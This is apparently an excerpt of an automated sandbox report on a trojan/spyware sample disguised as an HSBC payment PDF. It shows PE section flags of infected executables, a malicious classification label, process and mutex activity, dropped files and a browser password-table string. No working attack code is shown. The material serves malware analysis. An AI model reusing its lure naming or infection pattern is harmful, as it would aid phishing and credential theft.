                  Source: AutoIt3_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SearchIndexer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.2.drBinary string: base\stor\blb\catalog\compare.cpprowid1 != rowid2pKey->m_type == pCol->m_typepRow1 > pRow2_hImpersonationToken != INVALID_HANDLE_VALUEbase\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsuCurrentBit < HintSpaceBitmapSizeExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecovery\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\{{3808876B-C176-4e48-B7AE-04046E6CC752}ReplicationContext->FirstBlock != NULLIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGBackupFileName != NULLReplicationHandleReplicationContext != NULLoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSizereadBuffer != NULL\pagefile.sys\hiberfil.sys!IsListEmpty(&diffsInSource)
                  Source: wbengine.exe.2.drBinary string: base\stor\blb\engine\blbengutils\Blbvhdhelper.hthis->m_handle == NULL\\?\Globalroot\Device\Harddisk%lu\Partition1\\?\Globalroot\Device\Harddisk%lu\Partition2\\?\Globalroot\Device\HarddiskVolume%luChild_{47b7fa87-ce42-48ff-8b18-2f1088121503}WindowsBackupLinksbase\stor\blb\engine\blbengutils\blbvhdhelper.cppwszVhdFile && *wszVhdFilepwszVolumeDevicePathwszDiskPath && *wszDiskPathpwszVolumePathwszMountedDeviceName && *wszMountedDeviceNamepCBlbVhdwszMountedVolumePathNoSlash && *wszMountedVolumePathNoSlashpVhdContextpVhdContextForRemovalwszVolumeDevicePath && *wszVolumeDevicePathppVhdContextpVhdContext->m_pCBlbVhdsdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 || sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfopbIsVolVirtualppStorageDepInfowszTargetVolName && *wszTargetVolNamewszVirtualSrcVolName && *wszVirtualSrcVolNamepbIsVirtualSrcVolDependantpVolumeVHDInfo != NULLpstDepInfo != NULLpstDepInfoType2MaxAncestor != NULLpwszDiffVhdFilePath && pwszVhdTempPath%ws_%ws_%wspProgressReportCallbackContextwszVHDVolumeDevicePathpbCompactionRequiredwszVhdFilepGuidSnapshotIdwszVHDVolumeDevicePath && *wszVHDVolumeDevicePathpdwVHDDeviceDiskNumberpVhdHandle
                  Source: wbengine.exe.2.drBinary string: _((HANDLE)(LONG_PTR)-1) != hFilebase\stor\blb\dsm\dsmutils\dll\fsutilswrapper.cppExtractVolumePath(ssPath, ssVolumePath)SplitDirPath( ssDirPath, ssParentDir, ssDirName )GetParentPaths(ssPath, arrstrPaths)ssDirPath.Length() != 0base\stor\blb\dsm\dsmutils\dll\fsutils.cpppstrPath != 0pstrName != 0CLOCK$COMLPTCONPRNAUXNUL\\?\GLOBALROOT\Device\base\stor\blb\dsm\dsmutils\dll\fsutils.cppInvalid path:%lsssPath.Length() > 0GetVolumePrefixLength failed for %lsFailed to parse path:%lsExtractVolumePath(ssWorkingPath, ssVolumePath)ssWorkingPath[ssWorkingPath.Length() - 1] == L'\\'(((HRESULT)(hrReason)) < 0)pstrPath && pstrPath[0]pfIsReparsedppstrReparsePtPath && (*ppstrReparsePtPath == 0)GetFileAttributes() failed on:%lsIsPathMountPoint(ssPath.PeekStr(), &fMountPoint)pszVolumePath != 0phVolume != 0ssVolumePath[ssVolumePath.Length() - 1] == L'\\'Failed to open volume:%ls((HANDLE)(LONG_PTR)-1) == hVolumeppstrPath && *ppstrPath == 0dwPathLength > 0 && pstrFilePath[dwPathLength-1] == L'\\'0 != pdwFileAttributesGetFileInformationByHandle(hFile, &fileInfo)0 != lpstrFilePathCreateFile unsuccessful for %wsFSWrapperGetFileAttributes(hFile, pdwFileAttributes)0 != pFileAttributesGetFileInformationByHandleEx(hFile, FileBasicInfo, &fileInfo, sizeof(FILE_BASIC_INFO))GetFileSize failed for %ws((DWORD)-1) != dwFileAttributesGetFileInformationByHandleEx failedSetFileInformationByHandle failedFSWrapperSetFileAttributes(hFile, dwFileAttributes)SplitDirPath(strPath, strParent, strChild)Path %S is invalid as it contains a '.' or '..', hr=0x%08xHRESULT_FROM_WIN32(GetLastError())wszPath && wszPath[0]pfIsPathMountPoint
                  Source: wbengine.exe.2.drBinary string: base\stor\blb\engine\blbengutils\blbvolumeutils.cpppbFloppypguidVolumeId != NULLpbIsCritical != NULLpguidVolumeIdwszMountedDeviceNamewszVolumeGuidpwszReparsePointName\\?\GLOBALROOT\DEVICE\HARDDISKVOLUME%dWsbMountedVolumeFile%lu_%spVolumeCatrgVolumeLocalwszVolumeGuidPathpwszVolumeGlobalRootPathVolume%ws\\?\GLOBALROOT%wspdwlJournalIdplastUsnwszVolumeName && *wszVolumeNamepbPerformResizepdwlUsnSizevssSnapshotId != GUID_NULLdwlJournalId != BLB_INVALID_USN_JOURNAL_IDusnBeforeSnapShot != BLB_INVALID_USN_IDwszBackupSetDirectorypwszVhdPathwszVolumeName != NULLpbIsVolumeOnSharedDisk != NULLpbIsCSVpdwVolumeNumber6
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/155@22/12
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user\AppData\Roaming\aed9f0dd1e9bf5c4.binJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c4-inf
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c473779169-b
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c49ea72c54-b
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\autC5C5.tmpJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000011.00000002.3391146987.000000000434D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003406000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003438000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003444000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 81%
                  Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
